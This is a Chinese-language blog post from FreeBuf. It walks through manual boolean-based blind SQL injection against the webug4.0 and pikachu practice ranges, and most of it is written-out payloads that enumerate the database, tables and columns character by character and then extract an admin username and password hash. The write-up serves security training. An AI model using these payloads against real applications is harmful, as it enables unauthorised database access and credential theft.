webug靶场MySQL布尔型盲注手工通关笔记 – 作者:Alan404

靶场 webug4.0

有时候整数型注入也需要闭合

and 1=1 和 and1=2 都显示正常说明存在闭合

%23 在url代替注释符

有回显点，不一定可以联合查询，返回值可以被过滤掉 select被过滤

limit的作用：限制取一位

怎么判断是不是管理员的表：admin user …..

如果名字很乱，只能一个个猜

流程：猜库名长度，一个个猜长度，猜有多少表，每张表猜长度，表的长度猜完猜表的内容，判断哪里表里有你需要的内容（admin之类的，不然就只能一个个试），然后猜表里有多少个字段，每个字段的长度，之后再猜内容

库表列值

limit (0,1)取第一个表第一个值 从0开始计数

substr(‘abcdef’,start,length)

布尔盲注，不支持联合查询，知道数据库名后

1.查数据库长度 id=2‘ and length（database（））=5 %23

2.猜数据库的具体内容 and ascii（substr（database（），1，1））>1 %23

3.判断表名有多少个 and （select count（*）from information_schema.tables）

4.判断表的长度

5.

显错，输入错误的语句可以直接看到

database 取当前库

pikachu靶场盲注

1.第一个字段 vince 确定字段数 vince’ order by 2# 回显正常

2.查询数据库长度 vince’ and length(database())=7 # 回显正常

查询数据库名称 substr ：取值

vince’ and ascii(substr(database(),1,1))=112# //取数据库第一个值

vince’ and ascii(substr(database(),2,1))=105#

vince’ and ascii(substr(database(),3,1))=107#

vince’ and ascii(substr(database(),4,1))=97#

vince’ and ascii(substr(database(),5,1))=99#

vince’ and ascii(substr(database(),6,1))=104 #

vince’ and ascii(substr(database(),7,1))=117 #

解出对应的数据库：pikachu

3.判断数据库有多少个表

vince’ and (select count(*) from information_schema.tables where table_schema=database())=5 #

4.判断表名的长度

vince’ and(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=8#

vince’ and(select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=6#

vince’ and(select length(table_name) from information_schema.tables where table_schema=database() limit 2,1)=7#

vince’ and(select length(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5#

vince’ and(select length(table_name) from information_schema.tables where table_schema=database() limit 4,1)=8#

5.查询表的名称 取表的字符内容

第一张表 abcdef就是你select出来的结果 表名从0开始计数 取值从1开始计数

vince’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104 #

vince’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=116 #

vince’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=116 #

vince’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=112 #

vince’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))=105 #

vince’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))=110 #

vince’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))=102 #

vince’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),8,1))=111 #

得到 httpinfo

6.猜解httpinfo等各个表中有几列

vince’ and (select count(column_name) from information_schema.columns where table_name=’httpinfo’)=6 #

vince’ and(select count(column_name) from information_schema.columns where table_name=’member’)=7 #

vicne’ and(select count(column_name) from information_schema.columns where table_name=’message’)>0 #

vince’ and(select count(column_name) from information_schema.columns where table_name=’users’ and table_schema=database())=4 #

//如果不加 and table_schema=database() 就会默认搜索MySQL数据库中的所有名为users中的表，而不是pikachu这一个数据库中的表

message中为空表

table_schema 和 table_name一起锚定

7.猜解users表中列名字符长度 需要指定当前数据库 database()可以换成 ‘pikachu’ 查找列名的时候需要指定数据库，因为相同名字的数据库有很多

vince’ and (select length(column_name) from information_schema.columns where table_name=’users’ and table_schema=database() limit 0,1)=2 #

vince’ and (select length(column_name) from information_schema.columns where table_name=’users’ and table_schema=database() limit 1,1)=8 #

vince’ and (select length(column_name) from information_schema.columns where table_name=’users’ and table_schema=database() limit 2,1)=8 #

vince’ and (select length(column_name) from information_schema.columns where table_name=’users’ and table_schema=database() limit 3,1)=5 #

8.猜解第二列字符名称

取users表中第三列各个字符的值 //此处不指定当前的数据库也可以

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 2,1),1,1))=112 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 2,1),2,1))=97 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 2,1),3,1))=115 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 2,1),4,1))=115 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 2,1),5,1))=119 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 2,1),6,1))=111 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 2,1),7,1))=114 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 2,1),8,1))=100 #

对应的ASCII码为 password

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 1,1),1,1))=117 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 1,1),2,1))=115 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 1,1),3,1))=101 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 1,1),4,1))=114 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 1,1),5,1))=110 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 1,1),6,1))=97 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 1,1),7,1))=109 #

vince’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=’pikachu’ limit 1,1),8,1))=101 #

username

9.猜解username和password中的内容

猜解username中有几行

vince’ and (select count(username) from users)=3 #

判断users表中username字符的长度

vince’ and (select length(username )from users limit 0,1)=5 #

vince’ and (select length(username) from users limit 1,1)=7 #

vince’ and (select length(username) from users limit 2,1)=4 #

猜解username的内容 猜解第一行各个字符的内容

vince’ and ascii(substr((select username from users limit 0,1),1,1)) =97 #

vince’ and ascii(substr((select username from users limit 0,1),2,1)) =100 #

vince’ and ascii(substr((select username from users limit 0,1),3,1))=109 #

vince’ and ascii(substr((select username from users limit 0,1),4,1))=105 #

vince’ and ascii(substr((select username from users limit 0,1),5,1))=110 #

admin

10.猜解password

vince’ and (select length(password )from users limit 0,1)=32 # 猜测密码可能根据md5 加密为32位

vince’ and ascii(substr((select password from users limit 0,1),1,1)) =101# 得到结果为e

vince’ and ascii(substr((select password from users limit 0,1),2,1)) =49# 1

结果就不再一一演示

md5解密后得到账号密码

来源：freebuf.com 2021-04-26 13:40:24 by: Alan404